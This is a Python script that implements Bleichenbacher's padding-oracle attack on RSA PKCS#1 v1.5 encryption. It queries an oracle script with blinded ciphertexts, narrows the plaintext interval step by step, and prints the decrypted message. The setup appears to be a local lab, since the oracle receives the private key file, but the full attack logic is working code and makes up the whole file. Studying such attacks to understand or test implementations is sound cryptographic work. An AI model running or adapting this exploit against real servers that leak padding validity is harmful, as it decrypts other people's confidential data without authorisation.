import random, math, sys, os
import functools

# pip3 install gmpy2
import gmpy2

# pip3 install hexdump
import hexdump

# Size, in bits, of the fixed "00 02" prefix of a PKCS#1 v1.5 encryption block.
HEADER_BITS=16

if len(sys.argv) < 4:
    sys.exit("usage: %s <public_key.pem> <private_key> <ciphertext>" % sys.argv[0])

pub_fname=sys.argv[1]
pri_fname=sys.argv[2] # not used here. only passed to oracle
good_c_fname=sys.argv[3]

from cryptography.hazmat.primitives.serialization import load_pem_public_key
with open(pub_fname, "rb") as f:
    public_pem_data=f.read()
key = load_pem_public_key(public_pem_data)
BITS=key.key_size  # bit length of the modulus n
e=gmpy2.mpz(key.public_numbers().e)
n=gmpy2.mpz(key.public_numbers().n)

# The target ciphertext file is read as one raw big-endian unsigned integer.
with open(good_c_fname, "rb") as f:
    good_c=gmpy2.mpz(int.from_bytes(f.read(), byteorder="big", signed=False))
# An RSA ciphertext must be reduced mod n; anything else cannot be attacked.
if good_c >= n:
    sys.exit("ciphertext is not smaller than the modulus n")

def binlog(x):
    """Return the base-2 logarithm of the positive number x as a float.

    x is converted to a Python int first, so gmpy2 integers are accepted.
    Raises AssertionError when x is not positive.
    """
    assert x > 0
    as_int = int(x)
    return math.log(as_int, 2)

def short_hex(x):
    """Format an integer compactly for progress output.

    Values below 10 are printed in decimal, values below 2**64 as full hex,
    and anything larger as the first 12 and last 10 hex characters plus its
    base-2 logarithm.
    """
    if x < 10:
        return str(x)
    full = hex(x)
    if binlog(x) < 64:
        return full
    return "%s...%s log2=%.1f" % (full[:12], full[-10:], binlog(x))

# PKCS#1 v1.5 type-2 block: EM = 00 02 PS 00 M, exactly k bytes long, where
# k is the byte length of n.  Read as an integer, a conforming EM lies in
# [2B, 3B-1] with B = 2^(8*(k-2)).  BITS is rounded up to whole bytes so this
# stays correct when the modulus bit length is not a multiple of 8.
B=2**(8*((BITS+7)//8)-HEADER_BITS)
_2B=gmpy2.mpz(2*B)
_3B_1=gmpy2.mpz(3*B)-1

m_min=_2B    # smallest conforming plaintext
m_max=_3B_1  # largest conforming plaintext
s1_min=n//m_min  # n // (2B); note: this is the *larger* quotient despite its name
s1_max=n//m_max  # n // (3B-1)

calls_to_oracle=0  # running count of oracle invocations (incremented by step_1/step_2)

def search_first_zero_byte(b):
    """Return the index of the first zero element of b, or -1 if there is none.

    In a PKCS#1 v1.5 block the 00 separator must follow at least 8 nonzero
    padding bytes, i.e. sit at index >= 10 of the whole block.  This helper
    does not enforce that; it only locates the first zero.
    """
    return next((idx for idx, byte in enumerate(b) if byte == 0), -1)

def delete_if_exists(fname):
    """Remove fname if it is present; a missing file is not an error.

    Tries the unlink directly instead of checking os.path.exists() first.
    That avoids the check/unlink race, and it also removes dangling symlinks,
    which os.path.exists() reports as absent.  Other OSErrors (e.g. fname is
    a directory) still propagate.
    """
    try:
        os.unlink(fname)
    except FileNotFoundError:
        pass

def n_to_bytes(n, BITS):
    """Encode the non-negative integer n big-endian into ceil(BITS/8) bytes.

    BITS is the modulus bit length.  Rounding up gives the PKCS#1 byte length
    k even when BITS is not a multiple of 8; truncating would make large
    values fail to fit.  Raises OverflowError if n is negative or too large.
    """
    return int(n).to_bytes(length=(BITS + 7) // 8, byteorder="big", signed=False)

def oracle(c):
    """Ask the external padding oracle about ciphertext c.

    c (a gmpy2.mpz) is written big-endian, padded to the modulus byte length,
    to a per-process temp file.  The file is then passed together with the
    private-key path to ./oracle_openssl.py.  An exit status of 0 is treated
    as "valid padding" (True); any other status as False.  The temp file is
    removed even if writing or spawning fails.  If the oracle script cannot
    be executed at all, the OSError propagates instead of being silently
    reported as "invalid padding".
    """
    import subprocess  # local import: only the oracle spawns processes

    assert isinstance(c, gmpy2.mpz)
    fname1="tmp1_"+str(os.getpid())
    delete_if_exists(fname1)
    try:
        with open(fname1, "wb") as f:
            f.write(n_to_bytes(c, BITS))
        # argv list and no shell: file names are passed verbatim, never
        # interpreted by /bin/sh.
        rt = subprocess.run(["./oracle_openssl.py", fname1, pri_fname]).returncode
    finally:
        delete_if_exists(fname1)
    return rt == 0

def intervals_intersection(i1_s, i1_e, i2_s, i2_e):
    """Intersect the closed intervals [i1_s, i1_e] and [i2_s, i2_e].

    Returns (start, end) of the overlap, or None when the intervals are
    disjoint.  Touching endpoints count as overlapping.
    See https://scicomp.stackexchange.com/questions/26258/the-easiest-way-to-find-intersection-of-two-intervals
    """
    if i2_s <= i1_e and i1_s <= i2_e:
        return max(i1_s, i2_s), min(i1_e, i2_e)
    return None

def step_1():
    """Bleichenbacher step 2a plus step 3 for the first conforming s.

    Starting at s = n // (3B-1), query the oracle with good_c * s^e mod n
    until it reports valid padding.  For that s, every r with
        ceil((2B*s - (3B-1)) / n) <= r <= floor(((3B-1)*s - 2B) / n)
    gives a candidate interval
        m in [ceil((2B + r*n)/s), floor((3B-1 + r*n)/s)],
    clipped to [2B, 3B-1].

    Returns a list of (lower, upper, s) tuples of gmpy2.mpz.
    Raises RuntimeError if s reaches n without a conforming answer.
    """
    global calls_to_oracle
    t=[]
    print ("step_1() begin")
    s=n // _3B_1
    while True:
        print("step_1. trying s", short_hex(s),"  \r", end="")
        rt=oracle(good_c*pow(s, e, n) % n)
        calls_to_oracle += 1
        if rt:
            break
        s += 1
        if s >= n:
            raise RuntimeError("step_1: no conforming s found below n")

    print ("rt=True")
    print ("s", short_hex(s))
    # Exact r range from the paper; -((-x) // y) is ceil(x / y).
    r_min = -((-(_2B*s - _3B_1)) // n)
    r_max = (_3B_1*s - _2B) // n
    print ("overlaps in range (inclusive): ", r_min, r_max)
    for overlaps in range(r_min, r_max+1):
        lower = -((-(_2B + n*overlaps)) // s)  # ceil: m*s - r*n must be >= 2B
        upper = (_3B_1 + n*overlaps) // s      # floor: m*s - r*n must be <= 3B-1
        if lower > upper:
            continue
        # Clip to [2B, 3B-1] rather than dropping partially overlapping
        # intervals, which could hold the real plaintext.
        clipped = intervals_intersection(_2B, _3B_1, lower, upper)
        if clipped is None:
            continue
        lower, upper = clipped
        print ("m is between:", short_hex(lower), short_hex(upper))
        print ("lower:")
        hexdump.hexdump(n_to_bytes(lower, BITS))
        print ("upper:")
        hexdump.hexdump(n_to_bytes(upper, BITS))
        if upper > lower:  # binlog() rejects 0
            print ("binlog(diff) %.1f" % binlog(upper-lower))
        t.append((lower, upper, s))
    return t

def _step_3_single(a, b, s):
    """Bleichenbacher step 3 for one interval: narrow [a, b] given a conforming s.

    Every r with ceil((a*s - (3B-1))/n) <= r <= floor((b*s - 2B)/n) is tried.
    Each yields m in [ceil((2B + r*n)/s), floor((3B-1 + r*n)/s)].  Returns
    the hull (lower, upper) of those pieces intersected with [a, b], or None
    if none overlaps.  Taking every feasible r (not just the one used to pick
    s) guarantees the result still contains m whenever [a, b] did.
    """
    r_min = -((-(a*s - _3B_1)) // n)   # ceil((a*s - (3B-1)) / n)
    r_max = (b*s - _2B) // n
    lo = hi = None
    for r in range(r_min, r_max + 1):
        rn = gmpy2.mpz(r)*n
        piece_lo = -((-(_2B + rn)) // s)  # ceil
        piece_hi = (_3B_1 + rn) // s      # floor
        if piece_lo > piece_hi:
            continue
        piece = intervals_intersection(a, b, piece_lo, piece_hi)
        if piece is None:
            continue
        lo = piece[0] if lo is None else min(lo, piece[0])
        hi = piece[1] if hi is None else max(hi, piece[1])
    if lo is None:
        return None
    return lo, hi


def step_2(a, b, s_start, r_span=0x800):
    """Bleichenbacher step 2c followed by step 3 for a single interval [a, b].

    Walks r upward from 2*((b*s_start - 2B) // n) for at most r_span values.
    For each r it tries every s in [(2B + r*n)//b, (3B-1 + r*n)//a] until the
    oracle reports valid padding, then narrows [a, b] with that s.

    Returns (s, m_lower, m_upper) as gmpy2.mpz.  Returns None when the
    narrowed interval is empty (m was not in [a, b]) or no conforming s was
    found within r_span values of r.
    """
    global calls_to_oracle
    assert isinstance(a, gmpy2.mpz)
    assert isinstance(b, gmpy2.mpz)
    assert isinstance(s_start, gmpy2.mpz)
    print ("step_2")
    print ("a (lower)", short_hex(a))
    print ("b (upper)", short_hex(b))
    print ("s_start", short_hex(s_start))
    r_start=2*((b*s_start - _2B) // n)
    print ("r_start", short_hex(r_start))
    for r in range(r_start, r_start+r_span):
        print ("current r=", short_hex(r),"\r", end="")
        rn = gmpy2.mpz(r)*n
        s_lower=(_2B + rn)//b
        s_upper=(_3B_1 + rn)//a
        for s in range(s_lower, s_upper+1):
            s = gmpy2.mpz(s)
            rt=oracle((good_c*pow(s, e, n)) % n)
            calls_to_oracle += 1
            if not rt:
                continue
            print ("Oracle called with s", short_hex(s))
            print ("Valid padding.")
            tmp = _step_3_single(a, b, s)
            if tmp is None:
                return None
            m_lower, m_upper = tmp
            print ("new m_lower/m_upper", short_hex(m_lower), short_hex(m_upper))
            print ("m_lower:")
            hexdump.hexdump(n_to_bytes(m_lower, BITS))
            print ("m_upper:")
            hexdump.hexdump(n_to_bytes(m_upper, BITS))
            assert m_upper >= m_lower
            if m_upper > m_lower:
                print ("diff", short_hex(m_upper-m_lower))
            return s, m_lower, m_upper

    print ("Loop finished!")
    return None

def remove_padding(b):
    """Strip PKCS#1 v1.5 encryption padding (00 02 PS 00) and return the message.

    b is the full decoded block as bytes/bytearray.  Raises ValueError if it
    does not start with 00 02 or has no 00 separator after that header.
    Previously a missing separator silently returned the padding bytes.
    """
    if b[0:2] != b"\x00\x02":
        raise ValueError("not a PKCS#1 v1.5 type 2 block (expected leading 00 02)")
    sep = b.find(b"\x00", 2)
    if sep < 0:
        raise ValueError("no 00 separator after the PKCS#1 v1.5 padding")
    return b[sep + 1:]

def _find_plaintext(lower, upper):
    """Return the m in [lower, upper] whose RSA encryption equals good_c, else None.

    RSA is a permutation of Z_n, so this identifies the plaintext exactly
    instead of guessing an endpoint of a collapsed interval.
    """
    target = good_c % n
    for m in range(lower, upper + 1):
        m = gmpy2.mpz(m)
        if pow(m, e, n) == target:
            return m
    return None


bounds=step_1()
while bounds:
    new_bounds=[]
    for lower, upper, s in bounds:
        tmp = step_2(lower, upper, s)
        if tmp is not None:
            s, lower, upper = tmp
            if upper-lower<=1:
                m = _find_plaintext(lower, upper)
                if m is not None:
                    print ("Found! m:")
                    m_b=n_to_bytes(m, BITS)
                    hexdump.hexdump(m_b)
                    print ("With PKCS#1 1.5 padding removed:")
                    hexdump.hexdump(remove_padding(m_b))
                    print ("calls_to_oracle", calls_to_oracle)
                    sys.exit(0)
                # Collapsed onto values that do not encrypt to good_c: this
                # candidate never held the plaintext, so stop refining it.
                print ("Interval collapsed without matching good_c; dropping it")
            else:
                new_bounds.append((lower, upper, s))
        print ("calls_to_oracle", calls_to_oracle)
        print ("current len(bounds)", len(bounds))
    bounds=new_bounds

# Reached only when every candidate interval has been discarded.
print ("Main loop finished without any result. Error.")
sys.exit(1)

